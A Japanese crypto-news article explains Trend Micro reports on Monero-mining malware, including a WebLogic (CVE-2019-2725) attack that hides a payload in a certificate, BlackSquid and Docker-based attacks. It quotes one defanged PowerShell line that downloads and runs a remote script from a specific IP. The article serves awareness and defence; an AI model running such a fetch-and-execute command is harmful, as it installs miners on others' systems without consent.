はじめての仮想通貨
TOP 新着一覧 チャート 学習-運用
CoinPostで今最も読まれています

現在も絶えない仮想通貨モネロ(XMR)「マイニングマルウェア」の脅威|独自考察

画像はShutterstockのライセンス許諾により使用

マイニングマルウェアの脅威が絶えない
トレンドマイクロ社が、仮想通貨モネロをマイニングするマルウェアの脅威について報告書を公開した。当該脆弱性の分析、そして現在も存在している端末に侵入してマイニングを行うマルウェアについて確認する。

トレンドマイクロ社が報告書を公開

サイバーセキュリティを専門とする「トレンドマイクロ社」は6月10日、マイニングマルウェアの脅威について報告書を公開した。

公開された報告書は、【Oracle Weblogic】というソフトウェアの脆弱性(CVE-2019-2725)を利用して仮想通貨モネロをマイニングするマルウェアに関するものだ。当該脆弱性の分析、そして2019年に入ってからも続く、端末に侵入してマイニングを行うマルウェア(ここではマイニングマルウェアと呼称する)について見ていきたい。

トレンドマイクロ社の報告から見えてくるもの

このマルウェアに関する分析は、SANS ISC INFOSECフォーラムが情報源となっている。

そもそもOracle WebLogicは、JAVAが動くアプリケーションサーバーだ。もう少し詳しく説明すると、オラクル社が提供する業務用ミドルウェアや開発者向け製品などのソフトウェア製品群であり、エンジニアを除けば普通は扱うことはないだろう。

しかし、脆弱性の利用方法を見ていくと興味深い点が見つかる。ブラウザはHTTPSで暗号化された通信を行うため、相手が正しいURL(例えば coinpost.jp)であることを証明書を使って確認する。そして、今回はこの証明書に攻撃のペイロード(実際に攻撃を行うためのコード)が含まれていた。

以下の画像は、証明書を実際に見たことがある人向けだが、一見、普通の証明書に見える。

出典 : TREND MICRO

しかしこれをデコードすると、攻撃ペイロードのPowershellスクリプトが含まれていることが分かる。URLはhxxpとなっているが、特定のIPアドレスに通信を行っていることが分かるだろうか。この処理が行われてしまうと、update.ps1というスクリプトが実行され、勝手にモネロをマイニングされてしまうのだ。

iex(New-ObjectNet.WebClient).DownloadString(‘hxxp://139.180.199.167:1012/update[.]ps1’)

証明書を利用してマルウェアを配布するというアイデア自体は目新しいものではない。 昨年時点で概念実証は行われており、Excelをマクロを含めて実行させるなど、実行可能であることが示されていた。

一方で今回の事例を見ると、証明書に隠したスクリプト単体で動作するものではなく、特定IPへの通信は複雑な技術を用いずに通信される仕組みになっている。つまり、この通信をマルウェア対策ソフトウェアなどで検知される可能性があるということだ。この点は、まだまだ攻撃に改良の余地があることを示しており、報告書でもテストの可能性があると述べている。

活発化するマイニングマルウェアによる攻撃

ビットコインなど暗号資産の価格が上昇するに伴い、攻撃者の活動も活発化している様子だ。 6月10日には8つの脆弱性を利用してマイニングマルウェアを送り込むBlackSquidについて、6月11日にはインターネットから接続可能なデバイスを探索した上でDockerコンテナを送り込むという手口に関して、同様にトレンドマイクロ社が日本語で注意喚起している。

前者のBlackSquidは、いずれも比較的古い脆弱性(EternalBlueやDoublePalserと呼ばれるもの等)を対象としており、恐らく既存のマルウェアなどを組み合わせたものと考えられる。

攻撃結果として、やはりモネロのマイニングを行うマイナーXMRigを起動する。 タイと米国で多く検出されたということだが、実装されていない機能も存在することから、将来的にさらなる開発が進められる可能性があるとのことだ。

エラーを含むコードや意図的にスキップされた機能を考慮すると、このマルウェアは開発およびテストの段階にあると考えられる。今後、不正アクセスや情報窃取などのさまざまな攻撃に利用されるかもしれない。あるいは、GPUリソースの有無によってコンポーネントを使い分けながら最も多くの利益を上げられる方法を調査しているのかもしれない。

さらに、彼らは大きな資本投下はせずに特定の標的を定めようとしている可能性もある。そのように考えられる理由は、BlackSquidが利用する脆弱性攻撃コードおよび手口の大多数がアンダーグラウンドで共有されているものであることや、「Shodan」のような有料のサービスを利用して対象を絞り込まずにランダムに生成したIPアドレスに攻撃を仕掛けている点だ。

また、後者のDockerコンテナを用いた手口でも、やはりMoneroを採掘するマイナーが含まれていた。Dockerに代表されるコンテナ技術は、LinuxやWindowsといったOSそれ自体を管理する手間を省力化できるなどの理由で急速に普及している。一方、新しい技術であることから、設定ミスがあると攻撃に晒されてしまう事例と言える。

出典 : TREND MICRO

おわりに

トレンドマイクロ社から報じられた攻撃について、複数の種類のマイニングマルウェアが出回っている点を紹介した。攻撃者がモネロをマイニングするのは利益や匿名性といった点を考慮した結果だと思われるが、将来も同じとは限らない。

また、暗号資産のマイニングに限らず、脆弱な環境は様々な形で悪用されてしまうだろう。ユーザー側の対策としては、OSやソフトウェアはなるべく最新にアップデートしたり、何か新しいものを取り入れるときは公式の情報を確認したり、仕組みを理解して使うことが大切だ。

坪 和樹

Twitter:https://twitter.com/TSB_KZK

Linkedin:https://www.linkedin.com/in/tsubo/

プロフィール:AWSで働くエンジニア、アイルランド在住。MtGoxやThe DAOでは被害を受けたが、ブロックチェーンのセキュリティに興味を持ち続けている。セキュリティカンファレンスでの講演、OWASP Japanの運営協力やMini Hardeningといったイベント立ち上げなど、コミュニティ活動も実績あり。

CoinPostの関連記事

流出した2300万XRP(リップル)の行方、仮想通貨交換所が一部の売却阻止に成功
仮想通貨取引所GateHubから総額23,200,000XRP(約10億円)の仮想通貨XRPが流出した事件で、交換サービスChangeNowはその一部の差し止めに成功したことがわかった。
仮想通貨「ミキシングサービス」の相次ぐ閉鎖、資金引き出しに関するリスクも
大手ミキシングサービスBitBlenderが閉鎖してサービス停止が発表された。同様のサービスの閉鎖が相次いでおり、仮想通貨ビットコインなど預けた資産が取り出せなくなるケースが多発している。
CoinPost App DL
注目・速報 市況・解説 動画解説 新着一覧
02/16 日曜日
14:00
今週の主要仮想通貨材料まとめ、企業のビットコイン購入やXRP・SOLのETF審査開始など
前週比で振り返る仮想通貨市場の最新動向。ビットコインやイーサリアム、XRP、ソラナなど主要銘柄の騰落率や注目材料を一挙紹介。市場トレンドと関連ニュースを詳しく解説する。
11:00
週刊仮想通貨ニュース|金融庁の送金決済規制見直しに高い関心
今週は、金融庁による仮想通貨・ステーブルコインの送金決済規制見直し、アーサー・ヘイズ氏への独占インタビュー、VanEckによる米20州のビットコイン準備金法案分析に関する記事が最も関心を集めた。
02/15 土曜日
13:20
SECの仮想通貨規制方針に転換の兆し 、コインベース訴訟延期で銘柄分類を再検討へ
SECが、仮想通貨タスクフォースによる作業を理由にコインベース控訴への回答を延期した。証券性判断の見直しに注目が集まる。
11:35
ミームコイン熱狂でビットコインオンチェーン活動低迷に、ピーク時から55%減少の実態
ミームコイン熱狂で仮想通貨ビットコインのオンチェーン活動が直近7日間で55%減少。12ヶ月最低の動向と市場転換の背景は?
10:22
ソラナ基盤のミームコインプラットフォームPump.fun、モバイルアプリを公開
仮想通貨ミームコインのローンチパッドPump.funがiOS/Androidアプリ版をリリース。一方で英国などで法的懸念も浮上している。
08:50
金価格が史上最高値2942ドル到達 その背景は
金価格が今月史上最高値の2,966ドルを記録。米関税拡大懸念や脱ドル化が加速させた。中央銀行の金購入も過去10年で最高水準に到達。一方、仮想通貨ビットコインは9.7万ドル台で推移。
08:05
機関投資家のイーサリアム現物ETF保有率が急増、ゴールドマンなどが購入
2024年第4四半期の13F報告書から、機関投資家のイーサリアム現物ETF保有率が前四半期比で4.8%から14.5%に上昇。ビットコイン現物ETFは機関投資家比率21.5%で横ばいであった。
07:25
ETHのアップグレード「ペクトラ」、3月5日に最終テスト実施へ
イーサリアム財団が、仮想通貨ETHの次期大型アップグレード「ペクトラ」のテスト実施時期を公表。メインネットで4月に実施できるか注目が集まっている。
06:50
アブダビ政府系ファンド、昨年4QにブラックロックのビットコインETFに665億円投資
アブダビの政府系ファンド「ムバダラ」が、ブラックロックのビットコイン現物ETFに665億円を投資。2024年第4四半期の投資実施が明らかになった。
06:40
Jito Labsなど、米SECとの会議でステーキングをETFに組み込む方法を解説
Jito LabsとMulticoin Capitalは、米SECの仮想通貨規制タスクフォースとの会議で、ステーキングをETFに組み込む可能性について議論した。会議では、ステーキングが投資家に与える利益や、ETF内でのステーキングモデルについての提案が行われた。
06:20
XRP価格が10%高、現物ETF実現への期待高まる
仮想通貨XRPの価格が15日に前日比10%上昇し、2.72ドルを記録した。市場では、米証券取引委員会による現物XRPのETF承認への期待感が高まっている。
02/14 金曜日
17:55
PancakeSwap(パンケーキスワップ)の使い方│特徴から注意点まで
BNBチェーン上で最大規模のDEX、PancakeSwap(パンケーキスワップ)の基本機能と特徴を解説。低コストな取引手数料、豊富な収益機会、NFT取引など多彩な機能を備え、メタマスクで簡単に利用可能。使い方から注意点まで詳しく紹介。
15:00
GETプロジェクト×web3アイドル独占インタビュー エンタメ業界のグローバル展開を目指す
ブロックチェーン技術を活用し、アジア発のエンターテイメント革新を目指すGETプロジェクト。PR Director齊藤成芳氏とアイドルグループWHITE SCORPION、Rain Treeのメンバーへのインタビューを通じて、NIDTとの相乗効果、海外展開への展望、ファンとの新たな関係性構築など、次世代エンターテイメントビジネスの可能性に迫る。
15:00
ステーブルコイン「USDC」とは?Circle社のIPO計画から国内取扱いの展望まで
ステーブルコインの一種、USDCoin(USDC)の市場規模が拡大しています。 2023年末に約240億ドルまで落ち込んだ供給量は、1年間で徐々に回復。2025年2月時点には約…
14:00
【調査結果】国内取引所への上場期待が高い仮想通貨、トップ3は?
国内最大の仮想通貨メディアCoinPostで実施した「国内取引所への上場期待が高い仮想通貨銘柄調査」で、ソラナ(SOL)が48票、スイ(SUI)が37票を獲得し上位を占めた。RWA関連のONDOやミームコインへの期待も。技術力と将来性を重視する投資家の声が顕著に。

通貨データ

グローバル情報
一覧
プロジェクト
アナウンス
上場/ペア
重要指標
一覧
新着指標
一覧